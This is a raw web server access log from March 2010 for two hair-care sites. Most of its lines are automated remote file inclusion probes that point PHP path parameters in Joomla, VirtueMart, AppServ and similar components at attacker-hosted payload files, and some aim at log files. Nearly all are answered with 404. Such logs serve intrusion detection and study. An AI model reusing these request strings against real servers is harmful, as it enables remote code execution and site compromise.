200.93.147.154 - - [08/Mar/2010:14:00:29 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.93.147.154 - - [08/Mar/2010:14:00:30 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.93.147.154 - - [08/Mar/2010:14:00:30 -0800] "GET /logs/access_100111.log//skin/zero_vote/ask_password.php?dir=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.93.147.154 - - [08/Mar/2010:14:02:39 -0800] "GET /logs/access_091207.log//skin/zero_vote/ask_password.php?dir=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
99.57.90.154 - - [08/Mar/2010:14:07:09 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
99.57.90.154 - - [08/Mar/2010:14:07:09 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
99.57.90.154 - - [08/Mar/2010:14:07:09 -0800] "GET /logs/access_100111.log%20%20//skin/zero_vote/ask_password.php?dir=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.180.124.146 - - [08/Mar/2010:14:07:28 -0800] "GET /download.php?board_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
211.180.124.146 - - [08/Mar/2010:14:07:29 -0800] "GET /logs/access.log%20%20//download.php?board_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
211.180.124.146 - - [08/Mar/2010:14:07:30 -0800] "GET /logs//download.php?board_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
87.224.132.89 - - [08/Mar/2010:14:08:06 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
87.224.132.89 - - [08/Mar/2010:14:08:06 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
87.224.132.89 - - [08/Mar/2010:14:08:06 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
99.57.90.154 - - [08/Mar/2010:14:09:17 -0800] "GET /logs/access_091207.log%20%20//skin/zero_vote/ask_password.php?dir=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
95.215.1.3 - - [08/Mar/2010:14:10:07 -0800] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 2000) Opera 6.0 [en]" "freehairsecrets.com"
95.215.1.3 - - [08/Mar/2010:14:10:07 -0800] "GET / HTTP/1.0" 200 910 "http://freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 2000) Opera 6.0 [en]" "freehairsecrets.com"
87.224.132.89 - - [08/Mar/2010:14:11:24 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
87.224.132.89 - - [08/Mar/2010:14:11:24 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
87.224.132.89 - - [08/Mar/2010:14:11:24 -0800] "GET /logs/access_100125.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
87.224.132.89 - - [08/Mar/2010:14:14:11 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
87.224.132.89 - - [08/Mar/2010:14:14:11 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
87.224.132.89 - - [08/Mar/2010:14:14:11 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
87.224.132.89 - - [08/Mar/2010:14:22:21 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
87.224.132.89 - - [08/Mar/2010:14:22:21 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
87.224.132.89 - - [08/Mar/2010:14:22:21 -0800] "GET /logs/access_091207.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
87.224.132.89 - - [08/Mar/2010:14:22:25 -0800] "GET /logs/access_091019.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
87.224.132.89 - - [08/Mar/2010:14:23:18 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
87.224.132.89 - - [08/Mar/2010:14:23:18 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
87.224.132.89 - - [08/Mar/2010:14:23:18 -0800] "GET /logs/access_091207.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.126.254.139 - - [08/Mar/2010:14:23:49 -0800] "GET //?vwar_root=http://www.buddwriter.org/board/sc1? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
209.126.254.139 - - [08/Mar/2010:14:23:49 -0800] "GET /logs/access_100104.log%20%20///?vwar_root=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.126.254.139 - - [08/Mar/2010:14:23:49 -0800] "GET /logs///?vwar_root=http://www.buddwriter.org/board/sc1? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "growlonghairfast.com"
174.129.144.34 - - [08/Mar/2010:14:24:43 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; spbot/2.0.1; +http://www.seoprofiler.com/bot/ )" "growlonghairfast.com"
174.129.144.34 - - [08/Mar/2010:14:24:44 -0800] "GET /freehairsecretsphp/viewtopic.php?p=14487 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; spbot/2.0.1; +http://www.seoprofiler.com/bot/ )" "growlonghairfast.com"
209.126.254.139 - - [08/Mar/2010:14:42:10 -0800] "GET /logs/access_100104.log///?vwar_root=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
60.217.248.137 - - [08/Mar/2010:14:45:26 -0800] "GET /freehairsecretsphp/index.php HTTP/1.1" 200 349 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 4.6 (build 01425); MRSPUTNIK 1, 5, 0, 19 SW)" "www.freehairsecrets.com"
82.165.45.158 - - [08/Mar/2010:14:45:32 -0800] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 4.6 (build 01425); MRSPUTNIK 1, 5, 0, 19 SW)" "www.freehairsecrets.com"
212.138.69.24 - - [08/Mar/2010:14:45:36 -0800] "GET /freehairsecretsphp/index.php HTTP/1.1" 200 349 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 4.6 (build 01425); MRSPUTNIK 1, 5, 0, 19 SW)" "www.freehairsecrets.com"
123.125.156.151 - - [08/Mar/2010:14:45:48 -0800] "GET /freehairsecretsphp/index.php HTTP/1.1" 200 349 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 4.6 (build 01425); MRSPUTNIK 1, 5, 0, 19 SW)" "www.freehairsecrets.com"
60.217.248.69 - - [08/Mar/2010:14:45:50 -0800] "GET /freehairsecretsphp/index.php HTTP/1.1" 200 349 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 4.6 (build 01425); MRSPUTNIK 1, 5, 0, 19 SW)" "www.freehairsecrets.com"
60.217.232.72 - - [08/Mar/2010:14:45:54 -0800] "GET /freehairsecretsphp/index.php HTTP/1.1" 200 349 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 4.6 (build 01425); MRSPUTNIK 1, 5, 0, 19 SW)" "www.freehairsecrets.com"
196.35.158.181 - - [08/Mar/2010:14:45:57 -0800] "GET /freehairsecretsphp/index.php HTTP/1.1" 200 349 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 4.6 (build 01425); MRSPUTNIK 1, 5, 0, 19 SW)" "www.freehairsecrets.com"
212.143.253.83 - - [08/Mar/2010:14:45:59 -0800] "GET /freehairsecretsphp/index.php HTTP/1.1" 200 349 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 4.6 (build 01425); MRSPUTNIK 1, 5, 0, 19 SW)" "www.freehairsecrets.com"
118.175.22.69 - - [08/Mar/2010:14:46:03 -0800] "GET /freehairsecretsphp/index.php HTTP/1.1" 200 349 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 4.6 (build 01425); MRSPUTNIK 1, 5, 0, 19 SW)" "www.freehairsecrets.com"
60.217.232.72 - - [08/Mar/2010:14:46:06 -0800] "GET /freehairsecretsphp/index.php HTTP/1.1" 200 349 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 4.6 (build 01425); MRSPUTNIK 1, 5, 0, 19 SW)" "www.freehairsecrets.com"
60.217.232.72 - - [08/Mar/2010:14:46:08 -0800] "GET /freehairsecretsphp/index.php HTTP/1.1" 200 349 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 4.6 (build 01425); MRSPUTNIK 1, 5, 0, 19 SW)" "www.freehairsecrets.com"
202.115.3.107 - - [08/Mar/2010:14:46:11 -0800] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 4.6 (build 01425); MRSPUTNIK 1, 5, 0, 19 SW)" "www.freehairsecrets.com"
60.217.248.137 - - [08/Mar/2010:14:46:14 -0800] "GET /freehairsecretsphp/index.php HTTP/1.1" 200 349 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 4.6 (build 01425); MRSPUTNIK 1, 5, 0, 19 SW)" "www.freehairsecrets.com"
212.189.4.72 - - [08/Mar/2010:14:46:15 -0800] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 4.6 (build 01425); MRSPUTNIK 1, 5, 0, 19 SW)" "www.freehairsecrets.com"
60.217.232.72 - - [08/Mar/2010:14:46:16 -0800] "GET /freehairsecretsphp/index.php HTTP/1.1" 200 349 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 4.6 (build 01425); MRSPUTNIK 1, 5, 0, 19 SW)" "www.freehairsecrets.com"
211.138.124.202 - - [08/Mar/2010:14:46:19 -0800] "GET /freehairsecretsphp/index.php HTTP/1.1" 200 349 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 4.6 (build 01425); MRSPUTNIK 1, 5, 0, 19 SW)" "www.freehairsecrets.com"
60.217.248.137 - - [08/Mar/2010:14:46:21 -0800] "GET /freehairsecretsphp/index.php HTTP/1.1" 200 349 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 4.6 (build 01425); MRSPUTNIK 1, 5, 0, 19 SW)" "www.freehairsecrets.com"
60.217.248.83 - - [08/Mar/2010:14:46:23 -0800] "GET / HTTP/1.1" 200 926 "http://www.freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 4.6 (build 01425); MRSPUTNIK 1, 5, 0, 19 SW)" "www.freehairsecrets.com"
208.69.40.227 - - [08/Mar/2010:14:50:18 -0800] "GET /index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
208.69.40.227 - - [08/Mar/2010:14:50:18 -0800] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
208.69.40.227 - - [08/Mar/2010:14:50:18 -0800] "GET /logs/access.log%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
87.224.132.89 - - [08/Mar/2010:15:00:08 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
87.224.132.89 - - [08/Mar/2010:15:00:08 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
87.224.132.89 - - [08/Mar/2010:15:00:09 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
87.224.132.89 - - [08/Mar/2010:15:02:17 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
87.224.132.89 - - [08/Mar/2010:15:02:39 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
87.224.132.89 - - [08/Mar/2010:15:02:39 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
87.224.132.89 - - [08/Mar/2010:15:03:09 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
87.224.132.89 - - [08/Mar/2010:15:03:09 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
87.224.132.89 - - [08/Mar/2010:15:03:09 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
213.165.84.131 - - [08/Mar/2010:15:05:54 -0800] "GET /http://comweb.webkebi.kr/~eco-max/gboard/lib/pon.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
208.69.40.227 - - [08/Mar/2010:15:08:16 -0800] "GET /logs/access.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.205.50.6 - - [08/Mar/2010:15:10:30 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://macydaisy.com/upload/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.205.50.6 - - [08/Mar/2010:15:10:35 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://macydaisy.com/upload/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.205.50.6 - - [08/Mar/2010:15:10:35 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://macydaisy.com/upload/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
87.224.132.89 - - [08/Mar/2010:15:12:07 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
87.224.132.89 - - [08/Mar/2010:15:12:07 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
87.224.132.89 - - [08/Mar/2010:15:12:07 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
87.224.132.89 - - [08/Mar/2010:15:17:06 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
212.235.107.57 - - [08/Mar/2010:15:31:43 -0800] "GET /freehairsecretsphp/posting.php?mode=newtopic&f=1 HTTP/1.0" 200 333 "http://freehairsecrets.com/freehairsecretsphp/posting.php?mode=newtopic&f=1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Crazy Browser 2.0.0 Beta 1; .NET CLR 1.0.3705; .NET CLR 1.1.4322)" "freehairsecrets.com"
190.152.217.250 - - [08/Mar/2010:15:50:08 -0800] "GET /appserv/main.php?appserv_root=http://www.municipiodemejia.gov.ec//administrator/components/com_search/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
190.152.217.250 - - [08/Mar/2010:15:50:11 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.municipiodemejia.gov.ec//administrator/components/com_search/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
190.152.217.250 - - [08/Mar/2010:15:50:11 -0800] "GET /logs/access_091214.log//appserv/main.php?appserv_root=http://www.municipiodemejia.gov.ec//administrator/components/com_search/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
190.152.217.250 - - [08/Mar/2010:15:50:29 -0800] "GET /logs/access_091214.log//appserv/main.php?appserv_root=http://www.municipiodemejia.gov.ec//administrator/components/com_search/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
190.152.217.250 - - [08/Mar/2010:15:50:29 -0800] "GET /appserv/main.php?appserv_root=http://www.municipiodemejia.gov.ec//administrator/components/com_search/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.202.62.167 - - [08/Mar/2010:15:50:52 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; spbot/2.0.1; +http://www.seoprofiler.com/bot/ )" "freehairsecrets.com"
67.202.62.167 - - [08/Mar/2010:15:50:54 -0800] "GET /freehairsecretsphp/viewtopic.php?p=15183 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; spbot/2.0.1; +http://www.seoprofiler.com/bot/ )" "freehairsecrets.com"
67.202.62.167 - - [08/Mar/2010:15:51:37 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; spbot/2.0.1; +http://www.seoprofiler.com/bot/ )" "growlonghairfast.com"
67.202.62.167 - - [08/Mar/2010:15:51:38 -0800] "GET /freehairsecretsphp/viewtopic.php?p=17974 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; spbot/2.0.1; +http://www.seoprofiler.com/bot/ )" "growlonghairfast.com"
124.49.100.254 - - [08/Mar/2010:15:52:27 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
124.49.100.254 - - [08/Mar/2010:15:52:27 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
124.49.100.254 - - [08/Mar/2010:15:52:27 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
190.152.217.250 - - [08/Mar/2010:15:52:40 -0800] "GET /appserv/main.php?appserv_root=http://www.municipiodemejia.gov.ec//administrator/components/com_search/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
190.152.217.250 - - [08/Mar/2010:15:52:40 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.municipiodemejia.gov.ec//administrator/components/com_search/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
190.152.217.250 - - [08/Mar/2010:15:52:40 -0800] "GET /logs/access_091214.log%20%20//appserv/main.php?appserv_root=http://www.municipiodemejia.gov.ec//administrator/components/com_search/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
112.76.72.3 - - [08/Mar/2010:15:53:21 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
112.76.72.3 - - [08/Mar/2010:15:53:21 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
112.76.72.3 - - [08/Mar/2010:15:53:21 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
66.249.65.247 - - [08/Mar/2010:15:56:25 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.freehairsecrets.com"
190.152.217.250 - - [08/Mar/2010:15:58:59 -0800] "GET /appserv/main.php?appserv_root=http://www.municipiodemejia.gov.ec//administrator/components/com_search/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
190.152.217.250 - - [08/Mar/2010:16:00:03 -0800] "GET /logs/access_091214.log//appserv/main.php?appserv_root=http://www.municipiodemejia.gov.ec//administrator/components/com_search/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
190.152.217.250 - - [08/Mar/2010:16:00:03 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.municipiodemejia.gov.ec//administrator/components/com_search/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.129.106.91 - - [08/Mar/2010:16:00:44 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; spbot/2.0.1; +http://www.seoprofiler.com/bot/ )" "growlonghairfast.com"
174.129.106.91 - - [08/Mar/2010:16:00:45 -0800] "GET /freehairsecretsphp/viewtopic.php?p=2852 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; spbot/2.0.1; +http://www.seoprofiler.com/bot/ )" "growlonghairfast.com"
190.152.217.250 - - [08/Mar/2010:16:03:13 -0800] "GET /appserv/main.php?appserv_root=http://www.municipiodemejia.gov.ec//administrator/components/com_search/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
213.189.224.16 - - [08/Mar/2010:16:03:35 -0800] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://gbrzone.co.cc/wp-cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
213.189.224.16 - - [08/Mar/2010:16:03:35 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://gbrzone.co.cc/wp-cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
213.189.224.16 - - [08/Mar/2010:16:03:35 -0800] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://gbrzone.co.cc/wp-cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
213.189.224.16 - - [08/Mar/2010:16:03:35 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://gbrzone.co.cc/wp-cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
213.189.224.16 - - [08/Mar/2010:16:03:35 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://gbrzone.co.cc/wp-cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
213.189.224.16 - - [08/Mar/2010:16:03:35 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://gbrzone.co.cc/wp-cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
190.152.217.250 - - [08/Mar/2010:16:03:55 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.municipiodemejia.gov.ec//administrator/components/com_search/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
190.152.217.250 - - [08/Mar/2010:16:03:55 -0800] "GET /logs/access_091214.log//appserv/main.php?appserv_root=http://www.municipiodemejia.gov.ec//administrator/components/com_search/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
